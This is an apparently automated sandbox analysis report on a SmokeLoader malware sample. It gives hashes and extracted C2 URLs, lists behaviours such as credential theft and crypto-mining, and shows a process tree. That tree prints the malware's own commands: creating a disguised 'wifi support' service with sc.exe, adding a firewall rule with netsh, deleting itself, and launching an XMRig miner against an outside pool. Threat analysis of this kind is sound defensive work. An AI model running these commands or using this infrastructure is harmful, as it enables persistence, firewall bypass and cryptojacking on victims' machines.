Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    28-03-2021 07:07

General

  • Target

    a27e10e9ae9c9322be87216d84ac718f.exe

  • Size

    163KB

  • MD5

    a27e10e9ae9c9322be87216d84ac718f

  • SHA1

    41ef20744ae39b938dd45b9e0fc15f3215fe0ce5

  • SHA256

    8501dc331081a8fdbb9f6a5789a8317acddd6ea7d5c0446f359df9c4922f9f72

  • SHA512

    622f387a16066681ab59e54d8d8ba7a404682f7e27d1ddd5e0694717a5a136551a55e6dd2b62380a49ebdc67242fde600e1b8b3ee6261d589973045bb298b895

Malware Config

Extracted

  • Family
    smokeloader
  • Version
    2020
  • C2
    http://xsss99.icu/upload/
    http://bingooodsg.icu/upload/
    http://junntd.xyz/upload/
    http://ginessa11.xyz/upload/
    http://overplayninsx.xyz/upload/
    http://bananinze.com/upload/
    http://daunimlas.com/upload/
  • rc4.i32
  • rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a27e10e9ae9c9322be87216d84ac718f.exe
    "C:\Users\Admin\AppData\Local\Temp\a27e10e9ae9c9322be87216d84ac718f.exe"
    1⤵
    • Loads dropped DLL
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:504
  • C:\Users\Admin\AppData\Local\Temp\F8BD.exe
    C:\Users\Admin\AppData\Local\Temp\F8BD.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im F8BD.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F8BD.exe" & del C:\ProgramData\*.dll & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2244
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im F8BD.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4028
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 6
        3⤵
        • Delays execution with timeout.exe
        PID:1284
  • C:\Users\Admin\AppData\Local\Temp\810.exe
    C:\Users\Admin\AppData\Local\Temp\810.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3656
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mqscyzmg\
      2⤵
      PID:1344
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ofbizycg.exe" C:\Windows\SysWOW64\mqscyzmg\
      2⤵
      PID:3644
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create mqscyzmg binPath= "C:\Windows\SysWOW64\mqscyzmg\ofbizycg.exe /d\"C:\Users\Admin\AppData\Local\Temp\810.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:3760
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description mqscyzmg "wifi internet conection"
      2⤵
      PID:3968
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start mqscyzmg
      2⤵
      PID:1792
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:2856
  • C:\Windows\SysWOW64\mqscyzmg\ofbizycg.exe
    C:\Windows\SysWOW64\mqscyzmg\ofbizycg.exe /d"C:\Users\Admin\AppData\Local\Temp\810.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3700
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:3192
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3732


Downloads

  Memory dump                                                        Filesize
  memory/504-2-0x0000000002580000-0x0000000002581000-memory.dmp      4KB
  memory/504-3-0x00000000001E0000-0x00000000001E9000-memory.dmp      36KB
  memory/504-4-0x0000000000400000-0x0000000000409000-memory.dmp      36KB
  memory/2760-10-0x0000000002590000-0x0000000002591000-memory.dmp    4KB
  memory/2760-13-0x0000000000400000-0x0000000000498000-memory.dmp    608KB
  memory/2760-12-0x0000000000B40000-0x0000000000BD5000-memory.dmp    596KB
  memory/2876-6-0x0000000000B40000-0x0000000000B56000-memory.dmp     88KB
  memory/3192-47-0x0000000004450000-0x000000000465F000-memory.dmp    2.1MB
  memory/3192-48-0x00000000006F0000-0x00000000006F6000-memory.dmp    24KB
  memory/3192-40-0x0000000000660000-0x0000000000675000-memory.dmp    84KB
  memory/3192-36-0x0000000000660000-0x0000000000675000-memory.dmp    84KB
  memory/3656-23-0x0000000000400000-0x0000000000415000-memory.dmp    84KB
  memory/3656-22-0x0000000000910000-0x0000000000923000-memory.dmp    76KB
  memory/3656-19-0x00000000024E0000-0x00000000024E1000-memory.dmp    4KB
  memory/3700-39-0x0000000000400000-0x0000000000415000-memory.dmp    84KB
  memory/3700-35-0x00000000012C0000-0x00000000012C1000-memory.dmp    4KB
  memory/3700-34-0x00000000012C0000-0x00000000012C1000-memory.dmp    4KB
  memory/3732-49-0x00000000032F0000-0x00000000033E1000-memory.dmp    964KB